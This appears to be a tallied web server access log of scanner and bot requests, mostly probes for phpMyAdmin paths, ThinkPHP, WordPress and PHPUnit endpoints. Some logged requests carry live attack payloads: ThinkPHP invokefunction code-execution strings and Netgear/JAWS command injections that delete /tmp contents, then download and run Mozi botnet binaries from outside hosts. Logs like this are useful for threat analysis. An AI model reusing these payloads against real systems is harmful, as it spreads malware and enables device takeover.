2 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /hudson/script HTTP/1.1
1 GET /index.php HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /main.php HTTP/1.1
1 GET /myadmin/ HTTP/1.1
1 GET /mysql/ HTTP/1.1
1 GET /openserver/phpmyadmin/ HTTP/1.1
1 GET /php-my-admin/ HTTP/1.1
1 GET /phpMyAdmin-2.2.3/ HTTP/1.1
1 GET /phpMyAdmin-2.2.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.4/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.5/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.5.6/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.5.7/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-alpha2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-beta2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0-rc3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.0/ HTTP/1.1
1 GET /phpMyAdmin-2/ HTTP/1.1
1 GET /phpMyAdmin/ HTTP/1.1
1 GET /phpMyAdmin2/ HTTP/1.1
102 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin2/ HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pma/ HTTP/1.1
2 GET /public/.env HTTP/1.1
1 GET /public/index.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /script HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]47[.]209[.]190:51507/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sqlite/main.php HTTP/1.1
1 GET /sqlitemanager/main.php HTTP/1.1
1 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET /wp-login.php HTTP/1.1
1 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 GET http[:]//www[.]msftncsi[.]com/ncsi.txt HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /_ignition/execute-solution HTTP/1.1
2 POST /api/jsonws/invoke HTTP/1.1
5 POST /boaform/admin/formLogin HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//maryblack[.]xyz/3fc7da990d3d0d644625e2d618fae3d7b35f3074f35a06feebf91234927c01590b376af20fac344cbdbca3f343d2a2d0f1646f8f1d3fc96b3a7458eb147b372c6dcb31be5bae11c348df9c4df2fd29311e4e3183461d1e39ea85d94d2b6cb23d HTTP/1.1